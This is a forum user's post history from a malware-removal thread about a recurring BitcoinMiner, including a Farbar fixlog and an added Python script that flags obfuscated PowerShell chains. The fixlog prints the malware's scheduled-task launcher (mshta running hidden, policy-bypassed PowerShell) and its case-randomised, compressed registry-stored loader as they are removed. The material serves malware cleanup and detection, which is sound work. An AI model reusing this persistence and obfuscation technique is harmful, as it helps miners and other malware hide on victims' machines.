_maros_
Members
Posts 6

Everything posted by _maros_
BitcoinMiner virus - keeps reappearing in Windows folder
_maros_ replied to _maros_'s topic in Resolved Malware Removal Logs
It works smoothly, no known implications. There was nothing else but this miner. Thank you very much for your help, it is much appreciated.
BitcoinMiner virus - keeps reappearing in Windows folder
_maros_ replied to _maros_'s topic in Resolved Malware Removal Logs
Great! Here you are, sir. I hope everything's clean. Addition.txt FRST.txt
BitcoinMiner virus - keeps reappearing in Windows folder
_maros_ replied to _maros_'s topic in Resolved Malware Removal Logs
No, there's nothing. I even checked it myself before the test and there were no such files. I assume it's deleted. Thank you very much, Aura.
BitcoinMiner virus - keeps reappearing in Windows folder
_maros_ replied to _maros_'s topic in Resolved Malware Removal Logs
Of course I can. Here you are. Quarantine.rar
BitcoinMiner virus - keeps reappearing in Windows folder
_maros_ replied to _maros_'s topic in Resolved Malware Removal Logs
Here it is:

Fix result of Farbar Recovery Scan Tool (x64) Version: 02.08.2018
Ran by Maros (17-08-2018 04:49:16) Run:1
Running from C:\Users\Maros\Desktop
Loaded Profiles: Maros (Available Profiles: Maros)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
VirusTotal: C:\Windows\SearchIndexer.exe
REG: REG QUERY "HKLM\Software\WOW6432Node\a" /s
DeleteKey: "HKLM\Software\WOW6432Node\a"
HKLM-x32\...\Run: [] => [X]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
R2 Windows Indexer; C:\Windows\SearchIndexer.exe [175104 2017-07-21] () [File not signed]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
Task: {3F899011-3DFF-41B4-8C6E-2E23C3219D01} - System32\Tasks\SystemSettings => mshta vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -WindowStyle hidden -ep bypass -nop -c $e=(Get-ItemProperty HKLM:\Software\WOW6432Node\a);Select-Object -ExpandProperty Shell;Invoke-Expression $e",0,True)(window.close)
Task: {74574B7F-D990-45FD-92A8-29D7DEF47A4B} - System32\Tasks\{F0F3D472-5E35-4B0C-9D3C-A69FE3F8FBD4} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxps://www.skype.com/go/downloading?source=lightinstaller&ver=7.33.0.105&LastError=-9
Task: {EB7F2515-2353-4092-BAD8-ED5393FA11F3} - System32\Tasks\{CE0AD542-538F-4623-AEA5-63EEEE4AF113} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxps://ui.skype.com/ui/0/7.33.0.105/sk/abandoninstall?source=lightinstaller&page=tsInstall
AlternateDataStreams: C:\ProgramData:NT2 [432]
AlternateDataStreams: C:\Users\All Users:NT2 [432]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [432]
AlternateDataStreams: C:\ProgramData\Data aplikací:NT2 [432]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [432]
AlternateDataStreams: C:\Users\Maros\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\Maros\AppData\Roaming:NT2 [432]
FirewallRules: [{A0658A65-BC19-435B-A6AF-DC175E006F99}] => (Allow) C:\Windows\SysWOW64\msiexec.exe
FirewallRules: [{3EE7CA85-7C7D-4B12-AEE2-F2242A121EA6}] => (Allow) C:\Windows\SysWOW64\msiexec.exe
C:\Windows\IEcache.exe
C:\Windows\IE.exe
C:\Windows\SearchIndexer.exe
EmptyTemp:
*****************

Processes closed successfully.
Restore point was successfully created.
VirusTotal: C:\Windows\SearchIndexer.exe => https://www.virustotal.com/file/acff01bde041c78aff3010ee98c2d108d4def08684131850cfec9b16daa818c7/analysis/1532948184/

========= REG QUERY "HKLM\Software\WOW6432Node\a" /s =========

HKEY_LOCAL_MACHINE\Software\WOW6432Node\a
    Shell    REG_SZ    (nEW-oBjEct sySTeM.iO.comPrEsSIoN.dEFlATeStREAm([sySteM.Io.memorYStReAm][sYStem.CoNveRT]::fRombASE64sTRiNg('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' ) , [SySTEM.iO.COMPrESSiON.cOmPresSioNMoDE]::decOmPrESS )|% { nEW-oBjEct SYstem.IO.STREaMReaDEr($_,[teXt.EnCOdiNg]::AsCii)}|% {$_.REadtoEnD()})|.((geT-vARiaBLE '*MDR*').name[3,11,2]-JoIN'')

========= End of Reg: =========

"HKLM\Software\WOW6432Node\a" => removed successfully
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\" => removed successfully
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => removed successfully
"HKLM\System\CurrentControlSet\Services\Windows Indexer" => removed successfully
Windows Indexer => service removed successfully
"HKLM\System\CurrentControlSet\Services\catchme" => removed successfully
catchme => service removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast" => removed successfully
HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{3F899011-3DFF-41B4-8C6E-2E23C3219D01}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3F899011-3DFF-41B4-8C6E-2E23C3219D01}" => removed successfully
C:\Windows\System32\Tasks\SystemSettings => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemSettings" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{74574B7F-D990-45FD-92A8-29D7DEF47A4B}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{74574B7F-D990-45FD-92A8-29D7DEF47A4B}" => removed successfully
C:\Windows\System32\Tasks\{F0F3D472-5E35-4B0C-9D3C-A69FE3F8FBD4} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F0F3D472-5E35-4B0C-9D3C-A69FE3F8FBD4}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{EB7F2515-2353-4092-BAD8-ED5393FA11F3}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EB7F2515-2353-4092-BAD8-ED5393FA11F3}" => removed successfully
C:\Windows\System32\Tasks\{CE0AD542-538F-4623-AEA5-63EEEE4AF113} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{CE0AD542-538F-4623-AEA5-63EEEE4AF113}" => removed successfully
C:\ProgramData => ":NT2" ADS removed successfully
"C:\Users\All Users" => ":NT2" ADS not found.
"C:\ProgramData\Application Data" => ":NT2" ADS not found.
"C:\ProgramData\Data aplikací" => ":NT2" ADS not found.
C:\ProgramData\MTA San Andreas All => ":NT2" ADS removed successfully
C:\Users\Maros\AppData\Roaming => ":NT" ADS removed successfully
C:\Users\Maros\AppData\Roaming => ":NT2" ADS removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{A0658A65-BC19-435B-A6AF-DC175E006F99}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3EE7CA85-7C7D-4B12-AEE2-F2242A121EA6}" => removed successfully
Could not move "C:\Windows\IEcache.exe" => Scheduled to move on reboot.
C:\Windows\IE.exe => moved successfully
C:\Windows\SearchIndexer.exe => moved successfully

=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 18224314 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 36126 B
Edge => 0 B
Chrome => 224264191 B
Firefox => 55079034 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 33058 B
Public => 0 B
ProgramData => 0 B
systemprofile => 33058 B
systemprofile32 => 33490 B
LocalService => 132244 B
NetworkService => 55931862 B
Maros => 830138 B
UpdatusUser => 0 B
UpdatusUser => 0 B
UpdatusUser => 0 B
UpdatusUser => 0 B
docasny => 46497 B

RecycleBin => 0 B
EmptyTemp: => 338.2 MB temporary data Removed.

================================

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 17-08-2018 04:55:10)

C:\Windows\IEcache.exe => Is moved successfully

==== End of Fixlog 04:55:11 ====
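The fixlog above shows why the miner kept coming back: a scheduled task runs mshta, which launches a hidden PowerShell with the execution policy bypassed, reads the Shell value under HKLM\Software\WOW6432Node\a and evaluates it, and that value is case-randomised PowerShell that base64-decodes and deflate-decompresses the real payload. The Python triage script below is an added example, not part of this thread or of FRST: it runs over constructed lines modelled on that log and flags lines where several links of that chain co-occur; the indicator regexes and the mixed-case ratio are heuristics chosen for this example.

```python
import re

# Constructed sample modelled on the FRST fixlog in this thread; the base64
# blob is a placeholder. Lines 1 and 3 are benign controls for contrast.
SAMPLE_LINES = [
    r'Task: {3F899011-3DFF-41B4-8C6E-2E23C3219D01} - System32\Tasks\SystemSettings => mshta vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -WindowStyle hidden -ep bypass -nop -c $e=(Get-ItemProperty HKLM:\Software\WOW6432Node\a);Select-Object -ExpandProperty Shell;Invoke-Expression $e",0,True)(window.close)',
    r'Task: {74574B7F-D990-45FD-92A8-29D7DEF47A4B} - System32\Tasks\{F0F3D472-5E35-4B0C-9D3C-A69FE3F8FBD4} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxps://www.skype.com/go/downloading?source=lightinstaller',
    r"    Shell    REG_SZ    (nEW-oBjEct sySTeM.iO.comPrEsSIoN.dEFlATeStREAm([sySteM.Io.memorYStReAm][sYStem.CoNveRT]::fRombASE64sTRiNg('<base64 omitted>'),[SySTEM.iO.COMPrESSiON.cOmPresSioNMoDE]::decOmPrESS)|% { nEW-oBjEct SYstem.IO.STREaMReaDEr($_,[teXt.EnCOdiNg]::AsCii)}|% {$_.REadtoEnD()})",
    r'Task: {00000000-0000-0000-0000-000000000000} - System32\Tasks\NightlyBackup => "C:\Program Files\Backup\backup.exe" /daily',
]

# One regex per link of the chain; run on the lowercased line so that
# case-randomised cmdlet and type names still match.
INDICATORS = [
    ("mshta launching powershell", r"mshta.*powershell"),
    ("execution policy bypass", r"-(ep|exec|executionpolicy)\s+bypass"),
    ("hidden window", r"-(w|windowstyle)\s+hidden"),
    ("inline eval", r"invoke-expression|\biex\b"),
    ("payload read from registry", r"get-itemproperty\s+hk(lm|cu):"),
    ("base64 payload", r"frombase64string"),
    ("compressed payload", r"deflatestream|gzipstream"),
]

def mixed_case_tokens(line, min_len=5, min_ratio=0.4):
    # Heuristic: PascalCase names flip case 2-3 times (DeflateStream,
    # ExpandProperty) and stay under the ratio; 'dEFlATeStREAm' flips 8 of 13.
    hits = []
    for tok in re.findall(r"[A-Za-z]+", line):
        flips = sum(a.islower() != b.islower() for a, b in zip(tok, tok[1:]))
        if len(tok) >= min_len and flips / len(tok) >= min_ratio:
            hits.append(tok)
    return hits

def score_line(line):
    low = line.lower()
    found = [name for name, pat in INDICATORS if re.search(pat, low)]
    if len(mixed_case_tokens(line)) >= 2:
        found.append("case-randomised obfuscation")
    return found

def triage(lines, min_score=2):
    # (index, score, indicators) for lines where links of the chain co-occur;
    # a single indicator, e.g. a hidden window alone, is too common to act on.
    out = []
    for i, line in enumerate(lines):
        found = score_line(line)
        if len(found) >= min_score:
            out.append((i, len(found), found))
    return out
```

On the sample, the SystemSettings task line fires five indicators and the registry value three, while both control lines score zero.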
Hello, I have a problem with a BitcoinMiner virus as detected by MBAM in my Windows folder. I've already tried to delete it, but it keeps reappearing after every reboot. I've read several threads here with the same problem, though no file had the same name. Also, MSE keeps moving it to quarantine automatically after start-up. However, after the first scan with MBAM, it detected a few more files which are gone now. Every attempt to delete it is to no avail, as it is somehow being downloaded repeatedly. The files are IE.exe and IEcache.exe in the Windows folder. I enclose the MBAM log as well as the FRST logs. Thanks a lot in advance, dear professionals. mbam-scan.txt Addition.txt FRST.txt